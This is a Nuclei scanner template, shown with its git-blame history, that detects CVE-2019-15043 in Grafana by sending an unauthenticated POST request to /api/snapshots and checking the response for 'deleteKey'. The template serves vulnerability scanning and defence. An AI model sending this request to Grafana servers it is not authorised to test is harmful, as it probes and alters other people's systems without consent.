nuclei-templates/cves/2019/CVE-2019-15043.yaml

id: CVE-2019-15043
info:
  author: bing0o
  name: Grafana unauthenticated API
  severity: medium
  tags: cve,cve2019,grafana

requests:
  - raw:
      - |
        POST /api/snapshots HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Content-Length: 235
        Accept: */*
        Accept-Language: en
        Content-Type: application/json

        {"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}

    matchers:
      - part: body
        type: word
        words:
          - deleteKey
misc changes 2021-01-02 04:59:06 +00:00			`id: CVE-2019-15043`
Create CVE-2019-15043.yaml 2020-07-04 13:05:56 +00:00			`info:`
			`author: bing0o`
			`name: Grafana unauthenticated API`
			`severity: medium`
Added tags to cves :sunglasses: (#813) * Added tags to cves :sunglasses: 2021-02-05 19:44:41 +00:00			`tags: cve,cve2019,grafana`

Create CVE-2019-15043.yaml 2020-07-04 13:05:56 +00:00			`requests:`
Added tags to cves :sunglasses: (#813) * Added tags to cves :sunglasses: 2021-02-05 19:44:41 +00:00			`- raw:`
			`- \|`
			`POST /api/snapshots HTTP/1.1`
			`Host: {{Hostname}}`
			`Connection: close`
			`Content-Length: 235`
			`Accept: /`
			`Accept-Language: en`
			`Content-Type: application/json`

			`{"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}`

Create CVE-2019-15043.yaml 2020-07-04 13:05:56 +00:00			`matchers:`
			`- part: body`
			`type: word`
			`words:`
			`- deleteKey`